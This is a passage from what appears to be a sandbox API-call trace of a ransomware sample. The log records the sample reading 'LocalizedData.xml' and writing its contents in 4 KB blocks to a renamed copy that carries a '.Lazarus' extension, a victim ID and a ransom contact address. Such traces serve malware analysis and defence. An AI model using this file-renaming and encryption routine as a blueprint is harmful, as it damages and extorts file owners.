(lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.603] GetFileType (hFile=0x420) returned 0x1 [0065.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0065.603] CloseHandle (hObject=0x420) returned 1 [0065.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0065.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0065.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0065.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0065.604] AreFileApisANSI () returned 1 [0065.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0065.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0065.604] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c)) returned 1 [0065.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0065.604] AreFileApisANSI () returned 1 [0065.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0065.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0065.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0065.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0065.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0065.605] GetLastError () returned 0x0 [0065.605] SetLastError (dwErrCode=0x0) [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0065.605] GetLastError () returned 0x0 [0065.605] SetLastError (dwErrCode=0x0) [0065.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71b00 [0065.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0065.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0065.605] AreFileApisANSI () returned 1 [0065.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0065.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0065.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0065.605] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.606] GetFileType (hFile=0x420) returned 0x1 [0065.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0065.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0065.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0065.606] AreFileApisANSI () returned 1 [0065.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0065.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0065.606] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.606] GetFileType (hFile=0x428) returned 0x1 [0065.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0065.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0065.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0065.607] GetLastError () returned 0x0 [0065.607] SetLastError (dwErrCode=0x0) [0065.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0065.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0065.607] GetLastError () returned 0x0 [0065.607] SetLastError (dwErrCode=0x0) [0065.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0065.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0065.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e650 [0065.607] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0065.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0065.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0065.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0065.609] GetLastError () returned 0x0 [0065.609] SetLastError (dwErrCode=0x0) [0065.609] GetLastError () returned 0x0 [0065.609] SetLastError (dwErrCode=0x0) [0065.610] GetLastError () returned 0x0 [0065.610] SetLastError (dwErrCode=0x0) [0065.610] GetLastError () returned 0x0 [0065.610] SetLastError (dwErrCode=0x0) [0065.610] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.610] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.611] GetLastError () returned 0x0 [0065.611] SetLastError (dwErrCode=0x0) [0065.611] GetLastError () returned 0x0 [0065.611] SetLastError (dwErrCode=0x0) [0065.611] GetLastError () returned 0x0 [0065.611] SetLastError (dwErrCode=0x0) [0065.611] GetLastError () returned 0x0 [0065.611] SetLastError (dwErrCode=0x0) [0065.612] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.612] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.612] GetLastError () returned 0x0 [0065.612] SetLastError (dwErrCode=0x0) [0065.612] GetLastError () returned 0x0 [0065.612] SetLastError (dwErrCode=0x0) [0065.612] GetLastError () returned 0x0 [0065.612] SetLastError (dwErrCode=0x0) [0065.612] GetLastError () returned 0x0 [0065.612] SetLastError (dwErrCode=0x0) [0065.613] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.613] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.613] GetLastError () returned 0x0 [0065.613] SetLastError (dwErrCode=0x0) [0065.613] GetLastError () returned 0x0 [0065.613] SetLastError (dwErrCode=0x0) [0065.613] GetLastError () returned 0x0 [0065.613] SetLastError (dwErrCode=0x0) [0065.613] GetLastError () returned 0x0 [0065.613] SetLastError (dwErrCode=0x0) [0065.613] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.614] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.614] GetLastError () returned 0x0 [0065.614] SetLastError (dwErrCode=0x0) [0065.614] GetLastError () returned 0x0 [0065.614] SetLastError (dwErrCode=0x0) [0065.614] GetLastError () returned 0x0 [0065.614] SetLastError (dwErrCode=0x0) [0065.614] GetLastError () returned 0x0 [0065.614] SetLastError (dwErrCode=0x0) [0065.614] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.614] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.615] GetLastError () returned 0x0 [0065.615] SetLastError (dwErrCode=0x0) [0065.615] GetLastError () returned 0x0 [0065.615] SetLastError (dwErrCode=0x0) [0065.615] GetLastError () returned 0x0 [0065.615] SetLastError (dwErrCode=0x0) [0065.615] GetLastError () returned 0x0 [0065.615] SetLastError (dwErrCode=0x0) [0065.615] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.615] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.615] GetLastError () returned 0x0 [0065.615] SetLastError (dwErrCode=0x0) [0065.616] GetLastError () returned 0x0 [0065.616] SetLastError (dwErrCode=0x0) [0065.616] GetLastError () returned 0x0 [0065.616] SetLastError (dwErrCode=0x0) [0065.616] GetLastError () returned 0x0 [0065.616] SetLastError (dwErrCode=0x0) [0065.616] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.616] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.616] GetLastError () returned 0x0 [0065.616] SetLastError (dwErrCode=0x0) [0065.616] GetLastError () returned 0x0 [0065.616] SetLastError (dwErrCode=0x0) [0065.617] GetLastError () returned 0x0 [0065.617] SetLastError (dwErrCode=0x0) [0065.617] GetLastError () returned 0x0 [0065.617] SetLastError (dwErrCode=0x0) [0065.617] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.617] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.617] GetLastError () returned 0x0 [0065.617] SetLastError (dwErrCode=0x0) [0065.617] GetLastError () returned 0x0 [0065.617] SetLastError (dwErrCode=0x0) [0065.617] GetLastError () returned 0x0 [0065.617] SetLastError (dwErrCode=0x0) [0065.618] GetLastError () returned 0x0 [0065.618] SetLastError (dwErrCode=0x0) [0065.618] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.618] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.618] GetLastError () returned 0x0 [0065.618] SetLastError (dwErrCode=0x0) [0065.618] GetLastError () returned 0x0 [0065.618] SetLastError (dwErrCode=0x0) [0065.618] GetLastError () returned 0x0 [0065.618] SetLastError (dwErrCode=0x0) [0065.618] GetLastError () returned 0x0 [0065.618] SetLastError (dwErrCode=0x0) [0065.619] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.619] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.619] GetLastError () returned 0x0 [0065.619] SetLastError (dwErrCode=0x0) [0065.619] GetLastError () returned 0x0 [0065.619] SetLastError (dwErrCode=0x0) [0065.619] GetLastError () returned 0x0 [0065.619] SetLastError (dwErrCode=0x0) [0065.619] GetLastError () returned 0x0 [0065.619] SetLastError (dwErrCode=0x0) [0065.619] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.620] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.620] GetLastError () returned 0x0 [0065.620] SetLastError (dwErrCode=0x0) [0065.620] GetLastError () returned 0x0 [0065.620] SetLastError (dwErrCode=0x0) [0065.620] GetLastError () returned 0x0 [0065.620] SetLastError (dwErrCode=0x0) [0065.620] GetLastError () returned 0x0 [0065.620] SetLastError (dwErrCode=0x0) [0065.620] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.620] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.621] GetLastError () returned 0x0 [0065.621] SetLastError (dwErrCode=0x0) [0065.621] GetLastError () returned 0x0 [0065.621] SetLastError (dwErrCode=0x0) [0065.621] GetLastError () returned 0x0 [0065.621] SetLastError (dwErrCode=0x0) [0065.621] GetLastError () returned 0x0 [0065.621] SetLastError (dwErrCode=0x0) [0065.621] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.621] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.621] GetLastError () returned 0x0 [0065.621] SetLastError (dwErrCode=0x0) [0065.622] GetLastError () returned 0x0 [0065.622] SetLastError (dwErrCode=0x0) [0065.622] GetLastError () returned 0x0 [0065.622] SetLastError (dwErrCode=0x0) [0065.622] GetLastError () returned 0x0 [0065.622] SetLastError (dwErrCode=0x0) [0065.622] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.622] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.622] GetLastError () returned 0x0 [0065.622] SetLastError (dwErrCode=0x0) [0065.622] GetLastError () returned 0x0 [0065.622] SetLastError (dwErrCode=0x0) [0065.623] GetLastError () returned 0x0 [0065.623] SetLastError (dwErrCode=0x0) [0065.623] GetLastError () returned 0x0 [0065.623] SetLastError (dwErrCode=0x0) [0065.623] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.623] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.623] GetLastError () returned 0x0 [0065.623] SetLastError (dwErrCode=0x0) [0065.623] GetLastError () returned 0x0 [0065.623] SetLastError (dwErrCode=0x0) [0065.623] GetLastError () returned 0x0 [0065.623] SetLastError (dwErrCode=0x0) [0065.623] GetLastError () returned 0x0 [0065.624] SetLastError (dwErrCode=0x0) [0065.624] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.624] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.624] GetLastError () returned 0x0 [0065.624] SetLastError (dwErrCode=0x0) [0065.624] GetLastError () returned 0x0 [0065.624] SetLastError (dwErrCode=0x0) [0065.624] GetLastError () returned 0x0 [0065.624] SetLastError (dwErrCode=0x0) [0065.624] GetLastError () returned 0x0 [0065.624] SetLastError (dwErrCode=0x0) [0065.624] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.625] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.625] GetLastError () returned 0x0 [0065.625] SetLastError (dwErrCode=0x0) [0065.625] GetLastError () returned 0x0 [0065.625] SetLastError (dwErrCode=0x0) [0065.625] GetLastError () returned 0x0 [0065.625] SetLastError (dwErrCode=0x0) [0065.625] GetLastError () returned 0x0 [0065.625] SetLastError (dwErrCode=0x0) [0065.625] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.625] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.626] GetLastError () returned 0x0 [0065.626] SetLastError (dwErrCode=0x0) [0065.626] GetLastError () returned 0x0 [0065.626] SetLastError (dwErrCode=0x0) [0065.626] GetLastError () returned 0x0 [0065.626] SetLastError (dwErrCode=0x0) [0065.626] GetLastError () returned 0x0 [0065.626] SetLastError (dwErrCode=0x0) [0065.626] ReadFile (in: hFile=0x428, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 